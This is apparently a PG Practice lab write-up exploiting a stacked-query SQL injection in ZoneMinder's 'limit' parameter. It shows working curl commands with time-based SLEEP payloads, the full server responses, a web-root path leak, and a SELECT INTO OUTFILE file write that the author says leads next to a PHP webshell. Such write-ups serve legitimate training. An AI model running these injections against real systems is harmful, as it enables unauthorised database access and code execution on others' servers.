SQL injection
The target ZoneMinder instance has been suspected to suffer from multiple vulnerabilities, including SQL injection.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ searchsploit -x php/webapps/41239.txt
Exploit: Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
URL: https://www.exploit-db.com/exploits/41239
Path: /usr/share/exploitdb/exploits/php/webapps/41239.txt
Codes: N/A
Verified: False
File Type: HTML document, ASCII text
Source: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=== FOXMOLE - Security Advisory 2016-07-05 ===
Zoneminder multiple vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Versions
=================
Zoneminder 1.29,1.30
Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Session Fixation, No CSRF Protect
ion
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: Zoneminder
Vendor URL: https://zoneminder.com/
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
Advisory Status: Public
CVE-Number: NA
CVE URL: NA
OVE-ID:
OVI-ID:
CWE-ID: CWE-89
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
[...REDACTED...]
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.The PoC in the paper shows a stacked query SQLi. The vulnerability is present at the limit parameter of the index.php file.
Confirmation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT SLEEP(5) -- -' | jq -sRr @uri) ; time curl -s -x http://localhost:8080 -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli"
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 20:12:07 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: ZMSESSID=htij1ciu1mrevms876l9f8gnl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: zmSkin=classic; expires=Thu, 18-Jan-2035 20:12:07 GMT; Max-Age=311040000
Set-Cookie: zmCSS=classic; expires=Thu, 18-Jan-2035 20:12:07 GMT; Max-Age=311040000
Vary: Accept-Encoding
Content-Length: 3631
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
{"result":"Ok","updated":"Tue 11th Mar, 4:12pm","total":"14","available":"14","logs":[{"TimeKey":"1738224236.700230","Component":"zmaudit","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"Deleted 194 log table entries by time","File":"zmaudit.pl","Line":null,"DateTime":"2025-01-30 03:03:56.700230","Server":""},{"TimeKey":"1738223336.781070","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog pausing for 30 seconds","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.781070","Server":""},{"TimeKey":"1738223336.774410","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog starting","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.774410","Server":""},{"TimeKey":"1738223336.660190","Component":"zmdc","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"'zmwatch.pl' started at 25\/01\/30 02:48:56","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.660190","Server":""},{"TimeKey":"1738223336.659130","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmwatch.pl' starting at 25\/01\/30 02:48:56, pid = 1437","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.659130","Server":""},{"TimeKey":"1738223336.291950","Component":"zmfilter","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"Scanning for events","File":"zmfilter.pl","Line":null,"DateTime":"2025-01-30 02:48:56.291950","Server":""},{"TimeKey":"1738223335.648340","Component":"zmdc","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.648340","Server":""},{"TimeKey":"1738223335.647160","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' starting at 25\/01\/30 02:48:55, pid = 1408","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.647160","Server":""},{"TimeKey":"1738223335.433430","Component":"zmdc","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"'zmfilter.pl' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.433430","Server":""},{"TimeKey":"1738223335.430490","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmfilter.pl' starting at 25\/01\/30 02:48:55, pid = 1403","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.430490","Server":""},{"TimeKey":"1738223335.325330","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Starting up services","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:55.325330","Server":""},{"TimeKey":"1738223332.321970","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"Server starting at 25\/01\/30 02:48:52","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:52.321970","Server":""},{"TimeKey":"1738223331.958250","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Command: start","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.958250","Server":""},{"TimeKey":"1738223331.912560","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Sanity checking States table...","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.912560","Server":""}],"state":"ok","options":{"Component":["zmaudit","zmdc","zmfilter","zmpkg","zmwatch"],"Pid":["1351","1376","1403","1408","1437"],"Level":["INF"],"File":["zmaudit.pl","zmdc.pl","zmfilter.pl","zmpkg.pl","zmwatch.pl"]}}
real 5.17s
user 0.01s
sys 0.00s
cpu 0%Testing the PoC query confirms the vulnerability as the web app took 5 seconds to respond
Blind Time-based SQLi
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT @@version -- -' | jq -sRr @uri) ; time curl -s -x http://localhost:8080 -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli"
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 20:14:17 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: ZMSESSID=1a9h4u4okaegli2i4l76hes2d0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: zmSkin=classic; expires=Thu, 18-Jan-2035 20:14:17 GMT; Max-Age=311040000
Set-Cookie: zmCSS=classic; expires=Thu, 18-Jan-2035 20:14:17 GMT; Max-Age=311040000
Vary: Accept-Encoding
Content-Length: 4025
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
{"result":"Ok","updated":"Tue 11th Mar, 4:14pm","total":"15","available":"15","logs":[{"TimeKey":"1741723992.059738","Component":"web_js","ServerId":null,"Pid":"1302","Level":"-2","Code":"ERR","Message":"TypeError: popup is null","File":"http:\/\/192.168.209.52:8080\/zm\/skins\/classic\/js\/skin.js","Line":"117","DateTime":"2025-03-11 16:13:12.059738","Server":""},{"TimeKey":"1738224236.700230","Component":"zmaudit","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"Deleted 194 log table entries by time","File":"zmaudit.pl","Line":null,"DateTime":"2025-01-30 03:03:56.700230","Server":""},{"TimeKey":"1738223336.781070","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog pausing for 30 seconds","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.781070","Server":""},{"TimeKey":"1738223336.774410","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog starting","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.774410","Server":""},{"TimeKey":"1738223336.660190","Component":"zmdc","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"'zmwatch.pl' started at 25\/01\/30 02:48:56","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.660190","Server":""},{"TimeKey":"1738223336.659130","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmwatch.pl' starting at 25\/01\/30 02:48:56, pid = 1437","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.659130","Server":""},{"TimeKey":"1738223336.291950","Component":"zmfilter","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"Scanning for events","File":"zmfilter.pl","Line":null,"DateTime":"2025-01-30 02:48:56.291950","Server":""},{"TimeKey":"1738223335.648340","Component":"zmdc","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.648340","Server":""},{"TimeKey":"1738223335.647160","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' starting at 25\/01\/30 02:48:55, pid = 1408","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.647160","Server":""},{"TimeKey":"1738223335.433430","Component":"zmdc","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"'zmfilter.pl' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.433430","Server":""},{"TimeKey":"1738223335.430490","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmfilter.pl' starting at 25\/01\/30 02:48:55, pid = 1403","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.430490","Server":""},{"TimeKey":"1738223335.325330","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Starting up services","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:55.325330","Server":""},{"TimeKey":"1738223332.321970","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"Server starting at 25\/01\/30 02:48:52","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:52.321970","Server":""},{"TimeKey":"1738223331.958250","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Command: start","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.958250","Server":""},{"TimeKey":"1738223331.912560","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Sanity checking States table...","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.912560","Server":""}],"state":"alert","options":{"Component":["web_js","zmaudit","zmdc","zmfilter","zmpkg","zmwatch"],"Pid":["1302","1351","1376","1403","1408","1437"],"Level":{"-2":"ERR","0":"INF"},"File":["http:\/\/192.168.209.52:8080\/zm\/skins\/classic\/js\/skin.js","zmaudit.pl","zmdc.pl","zmfilter.pl","zmpkg.pl","zmwatch.pl"],"Line":["117"]}}
real 0.05s
user 0.00s
sys 0.01s
cpu 11%Attempting to enumerate the version information failed. This might be a blind SQL injection only
Data Leak
/Practice/Pebbles/3-Exploitation/attachments/{330EF3B0-938E-4517-8F39-479B2C483B8C}.png)
Invoking an error manually reveals that the backend database is MySQL
Web Root Directory
/Practice/Pebbles/3-Exploitation/attachments/{90C2FDB9-054D-44E7-A69B-A37CFE353BB7}.png)
Sending a normal query now reveals all the logged SQL injection attempts, which leak the web root directory; /usr/sharee/zoneminder/www
Write Access
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT "SQLi" INTO OUTFILE "/usr/share/zoneminder/www/test" -- -' | jq -sRr @uri) ; curl -s -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli" Testing write access to the web root directory
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ curl http://$IP/zm/test
SQLiConfirmed. I can move on to writing a PHP webshell